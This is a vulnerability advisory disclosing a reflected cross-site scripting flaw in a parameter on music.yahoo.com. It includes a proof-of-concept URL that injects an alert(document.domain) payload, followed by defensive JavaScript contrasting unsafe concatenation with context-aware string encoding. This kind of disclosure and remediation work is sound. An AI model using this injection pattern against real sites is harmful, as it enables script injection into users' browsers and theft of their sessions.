Advisory: Yahoo Bug Bounty Program Vulnerability #6 Cross-site Scripting vulnerability

Advisory ID: SSCHADV2013-YahooBB-006
Author: Stefan Schurtz
Affected Software: Successfully tested on music.yahoo.com
Vendor URL: http://yahoo.com/
Vendor Status: Not tested anymore
Bounty: nothing

==========================
Vulnerability Description
==========================

The 'mode' parameter on "https://music.yahoo.com/" is prone to a Cross-site Scripting vulnerability.

==========================
PoC-Exploit
==========================

http://music.yahoo.com/videos/?m_id=&m_mode=&instance_id= mode=multipart"-alert(document.domain)-"&__phase=pre&type=index

==========================
Disclosure Timeline
==========================

20-Jan-2014 - vendor informed by contact form (Yahoo Bug Bounty Program)

==========================
Credits
==========================

Vulnerability found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2013-YahooBB-006.txt
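The shape of the PoC value (a stray double quote, an expression, and a second double quote that reopens the string) is the signature of a request parameter reflected verbatim into a double-quoted JavaScript string literal. The following is an added example, not code from the advisory or from Yahoo: it assumes that rendering context (the advisory gives only the parameter name and the payload) and shows the raw concatenation beside a context-aware encoder, with a check that the emitted script still contains exactly one string literal. The names `encodeJsString`, `renderVulnerable`, `renderHardened`, `literalIntact` and `decodeRendered` are illustrative.

```javascript
// Added example, not part of the advisory. The rendering context (an inline
// <script> assigning the 'mode' parameter to a string) is an assumption.

// Encode a value for use inside a JavaScript string literal: every character
// outside [A-Za-z0-9] becomes a \xHH or \uHHHH escape, so quotes, backslashes,
// angle brackets and line terminators can never terminate the literal.
function encodeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? "\\x" + code.toString(16).padStart(2, "0")
      : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// Vulnerable rendering (the defect the advisory describes): the parameter is
// concatenated into the script source without any encoding.
function renderVulnerable(mode) {
  return `<script>var mode = "${mode}";</script>`;
}

// Hardened rendering: the same template, with the value encoded for the
// JavaScript string context before it is inserted.
function renderHardened(mode) {
  return `<script>var mode = "${encodeJsString(mode)}";</script>`;
}

// Checks that the emitted script is still a single assignment of one string
// literal, i.e. the parameter value did not escape the quotes. A value that
// breaks out (as the PoC payload does) makes this return false.
const SCRIPT_BODY = /^<script>var mode = "(?:[^"\\]|\\.)*";<\/script>$/;
function literalIntact(markup) {
  return SCRIPT_BODY.test(markup);
}

// Recovers the string value a JavaScript engine would assign from the rendered
// literal, to show that encoding preserves the original value rather than
// mangling it. Returns undefined when no intact literal can be found.
function decodeRendered(markup) {
  const m = markup.match(/var mode = ("(?:[^"\\]|\\.)*");/);
  return m ? new Function(`return ${m[1]};`)() : undefined;
}

// Constructed sample input, using the payload shape from the advisory's PoC.
const POC_MODE = 'multipart"-alert(document.domain)-"';

// Summary of both renderings for a given input, as returned values.
function compare(mode) {
  return {
    vulnerableIntact: literalIntact(renderVulnerable(mode)),
    hardenedIntact: literalIntact(renderHardened(mode)),
    hardenedValue: decodeRendered(renderHardened(mode)),
  };
}
```

If the reflection point had been an HTML attribute rather than a script string, the encoder would have to be an HTML attribute encoder instead; the point is that the encoding must match the exact context the value lands in, and a single generic "sanitize" pass does not cover both.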